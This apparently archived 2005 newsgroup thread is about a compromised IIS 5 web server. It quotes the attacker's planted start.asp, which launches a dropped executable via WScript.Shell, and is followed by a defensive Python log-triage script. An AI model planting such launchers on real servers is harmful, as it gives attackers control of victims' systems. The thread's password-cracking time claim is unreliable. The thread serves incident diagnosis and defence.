IIS 5 Compromisation

Hi all,

my company has several servers acting as web servers hosted at an ISP and one of them was compromised by some warez bunnies.
All the servers have the latest patches and anti virus software running, but no firewall...

Several files appeared in a folder off one of the webs, being

kill.exe
shellconfig.ocx
shellsuccesslog.ocx
win.asp
start.asp
shellhost32.exe

win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and start.asp reads as follows

<%
CreateObject("WScript.Shell").Run("shellhost32.exe")
%>
<h1>Yes, you made it!! Good job dude!<\h1>

My question is, has anyone encountered this and how do they get the files there. Two questions, really.

Any help would be greatly appreciated, as they uploaded a significant amount of german dvd's and other garbage onto the server at our expense.

Regards,
Paul Korosi


On Wed, 6 Apr 2005 20:45:35 +1000, "Saturday Night Paulsy"
<pkor***@redpepper.com.au> wrote:

>Hi all,
>
>my company has several servers acting as web servers hosted at an ISP and
>one of them was compromised by some warez bunnies.
>All the servers have the latest patches and anti virus software running, but
>no firewall...
>
>Several files appeared in a folder off one of the webs, being
>
>kill.exe
>shellconfig.ocx
>shellsuccesslog.ocx
>win.asp
>start.asp
>shellhost32.exe
>
>
>win.asp has a title of "Hacking a pub tut by Skkwiddly. Wa2001", and
>start.asp reads as follows
>
><%
>CreateObject("WScript.Shell").Run("shellhost32.exe")
>%>
><h1>Yes, you made it!! Good job dude!<\h1>
>
>
>My question is, has anyone encountered this and how do they get the files
>there. Two questions, really.

To find out how they got there, check your audit logs and firewall logs. Oh yeah, you already figured out that they got there because you weren't secured and had no firewall. Likely you weren't auditing either. Possibly hadn't turned off anonymous file upload in FTP. Possibly your host got hacked. Possibly a SQL attack. Possibly using "password" as a password wasn't that smart. Too many possiblys for anyone to tell you for sure.

>Any help would be greatly appreciated, as they uploaded a significant amount
>of german dvd's and other garbage onto the server at our expense.

Bummer. Flatten the box, reinstall from scratch, patch, secure and get that firewall installed. Live and learn.

Jeff


ha ha - nice one Jeff,

I might be dumb but I aint that stupit. I admit I am no security specialist - I'm a programmer. I thought someone here might be able to shed some light, judging by the responses to the questions in this group, some of which quite frankly don't even belong in this group.

As for your suggestions, administrator only ftp access, 13 character strong password - it would even take YOU a century to work it out. All database submissions/requests are filtered against SQL injection attacks using regex. I simply can't see any way in via that side.

Anyways - it turns out it's the Win32.IRCFlood trojan, and appears to be fairly new as the only patch available to deal with it is dated yesterday. And, as my MSCE friend has just told me (after some research), firewalls won't necessarily stop it from getting on the box - only stop the gigs of sh*te from getting put on.

For anyone that might be interested, it was probably downloaded by someone doing "legit" work on the box by browsing. That's what the MSCE told me, anyways - and he's a good deal brighter than your average minesweeper certified solitaire expert.

Finally, thanks for your help. Next time I reckon I'll just fart 'cause it'll save all this typing time. I could've been drinking coffee instead.

"Jeff Cochran" <jeff.nospam@zina.com> wrote in message
news:42616af5.1154390806@msnews.microsoft.com...


On Thu, 7 Apr 2005 11:36:15 +1000, "Saturday Night Paulsy"
<pkor***@redpepper.com.au> wrote:

>ha ha - nice one Jeff,
>
>I might be dumb but I aint that stupit. I admit I am no security
>specialist - I'm a programmer. I thought someone here
>might be able to shed some light, judging by the responses to the questions
>in this group, some of which quite frankly
>don't even belong in this group.
>
>As for your suggestions, administrator only ftp access, 13 character strong
>password - it would even take YOU a
>century to work it out.

A 13 character string, assuming you didn't use high-ASCII characters since they're awfully hard to type in a password, is about 22 minutes to crack. Less if I can use an exploit to get the SAM database on an unpatched system. Is FTP set to lock out the user after x number of failed attempts?

>All database submissions/requests are filtered
>against SQL injection attacks using regex. I simply
>can't see any way in via that side.

It's the ways you can't see that come back to bite you. Are you using a standard port for SQL? Is *every* query parameterized and using stored procedures?

>Anyways - it turns out it's the Win32.IRCFlood trojan, and appears to be
>fairly new as the only patch available to deal with it
>is dated yesterday.

The Win32.IRCFlood!Trojan is several years old, and the major AV vendors have detected it for quite a while. This may be a newer variant, but even those should be detected. The older version used IRC ports for control, which would normally be blocked by a firewall on a system that didn't have IRC clients/servers running.

The major problem you have now though is that this trojan allows control of the system through a backdoor it installs. You may have found and removed the trojan, but do you know what other changes have been made to the system? Possibly none, but you don't have the logging in place to do the forensics to be sure. The advice still stands. Flatten the box and reinstall.

>And, as my MSCE friend has just told me (after some
>research), firewalls won't necessarily stop it from getting on
>the box - only stop the gigs of sh*te from getting put on.
>
>For anyone that might be interested, it was probably downloaded by someone
>doing "legit" work on the box by browsing. That's what
>the MSCE told me, anyways - and he's a good deal brighter than your average
>minesweeper certified solitaire expert.

The trojan in question is normally delivered via an executable, which when run installs the trojan and opens the backdoors. I haven't seen any newer attack vectors for it, but then I haven't looked either. A new variant may have a new vector. Or something else you haven't detected may be on the box as well.

>Finally, thanks for your help. Next time I reckon I'll just fart 'cause
>it'll save all this typing time. I could've been drinking coffee instead.

Next time, go ahead and fart *and* save the typing time. But install and correctly configure a firewall. Configure auditing. Install and use the latest version of your AV software. Security isn't a singular event, it's an ongoing process. Fortunately, you can still drink your coffee while monitoring it.

Jeff
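Both of Jeff's replies come back to the same first step: go to the audit logs and find the request that put the files there. As an added example (not from the thread or any poster), the following Python walks a constructed IIS 5 W3C log excerpt and flags content-changing HTTP methods together with the first request that touched each of the file names Paul listed; the log lines, client addresses and timestamps are made up.

```python
import os

# Constructed IIS 5 W3C extended log excerpt (sample data, not from the
# thread). File names are those in the original post; IPs and times are made up.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2005-04-05 02:11:08 203.0.113.7 - 192.0.2.10 80 GET /index.asp - 200 Mozilla/4.0
2005-04-05 02:11:09 203.0.113.7 - 192.0.2.10 80 PUT /pub/shellhost32.exe - 201 Mozilla/4.0
2005-04-05 02:11:10 203.0.113.7 - 192.0.2.10 80 PUT /pub/start.asp - 201 Mozilla/4.0
2005-04-05 02:11:12 203.0.113.7 - 192.0.2.10 80 GET /pub/start.asp - 200 Mozilla/4.0
2005-04-05 02:15:40 198.51.100.3 - 192.0.2.10 80 GET /about.asp - 200 Mozilla/4.0
"""

# Files the original poster found dropped into the web folder.
DROPPED_FILES = {"kill.exe", "shellconfig.ocx", "shellsuccesslog.ocx",
                 "win.asp", "start.asp", "shellhost32.exe"}
# HTTP methods that change content; a read-only web should never see them succeed.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL"}

def parse_w3c(text):
    """Turn W3C extended log text into dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # field names follow the directive
        elif line.startswith("#") or not line.strip():
            continue                        # other directives and blank lines
        elif fields:
            values = line.split()           # IIS writes '+' for spaces inside values
            if len(values) == len(fields):  # skip truncated lines
                rows.append(dict(zip(fields, values)))
    return rows

def triage(rows):
    """Flag content-changing requests and every request touching a dropped file."""
    report = {"write_requests": [], "dropped_hits": [],
              "first_seen": {}, "suspect_ips": set()}
    for r in rows:
        name = os.path.basename(r["cs-uri-stem"]).lower()
        if r["cs-method"].upper() in WRITE_METHODS:
            report["write_requests"].append(r)
            report["suspect_ips"].add(r["c-ip"])
        if name in DROPPED_FILES:
            report["dropped_hits"].append(r)
            report["suspect_ips"].add(r["c-ip"])
            # earliest request per dropped file marks where the timeline starts
            report["first_seen"].setdefault(name, (r["date"], r["time"], r["c-ip"]))
    return report
```

The same parser reads a real ex*.log from the IIS log directory because it takes its column layout from the #Fields directive rather than assuming one; a file whose dropped names never appear in the web log points at another upload path, such as FTP.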